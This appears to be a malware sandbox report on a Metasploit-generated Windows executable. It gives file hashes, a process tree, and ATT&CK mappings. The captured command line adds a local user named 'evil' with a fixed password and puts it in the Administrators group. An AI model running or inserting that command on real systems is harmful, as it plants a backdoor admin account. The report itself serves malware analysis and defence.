metasploit | c6d32aa42367461bbf30392751a11a894b24afdf53727efcdd21233c798cf1e7

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
20-04-2024 20:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
Size

72KB
MD5

fd8918c67d99f1c54e592b5fe79cd104
SHA1

9a10e9981c1e4c75c5a9b5253bd86d9057cc4fcf
SHA256

c6d32aa42367461bbf30392751a11a894b24afdf53727efcdd21233c798cf1e7
SHA512

9f6bc37aca37be6404ba348193608e8f3282a3ca2d879c40d2b467828c7300f0c63156da7e0cc21acff0cfd646ad09ed0ca4b3c0546f35925768ad7c340f9b81
SSDEEP

1536:IN/ukRRX3Y/S2SF8TuySzzWMenMb+KR0Nc8QsJq39:y2iRXzWTd1ne0Nc8QsC9

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/exec

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Runs net.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.execmd.exenet.exenet.exe

description	pid	process	target process
PID 2148 wrote to memory of 3048	2148	fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe	cmd.exe
PID 2148 wrote to memory of 3048	2148	fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe	cmd.exe
PID 3048 wrote to memory of 592	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 592	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 592	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 592	3048	cmd.exe	net.exe
PID 592 wrote to memory of 324	592	net.exe	net1.exe
PID 592 wrote to memory of 324	592	net.exe	net1.exe
PID 592 wrote to memory of 324	592	net.exe	net1.exe
PID 592 wrote to memory of 324	592	net.exe	net1.exe
PID 3048 wrote to memory of 1164	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 1164	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 1164	3048	cmd.exe	net.exe
PID 3048 wrote to memory of 1164	3048	cmd.exe	net.exe
PID 1164 wrote to memory of 1012	1164	net.exe	net1.exe
PID 1164 wrote to memory of 1012	1164	net.exe	net1.exe
PID 1164 wrote to memory of 1012	1164	net.exe	net1.exe
PID 1164 wrote to memory of 1012	1164	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\fd8918c67d99f1c54e592b5fe79cd104_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net user evil salah /ADD && net localgroup Administrators evil /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3048

C:\Windows\SysWOW64\net.exe
net user evil salah /ADD
3⤵
- Suspicious use of WriteProcessMemory
PID:592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user evil salah /ADD
4⤵
PID:324

C:\Windows\SysWOW64\net.exe
net localgroup Administrators evil /ADD
3⤵
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators evil /ADD
4⤵
PID:1012

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2148-0-0x0000000000020000-0x0000000000021000-memory.dmp

Filesize
4KB

Download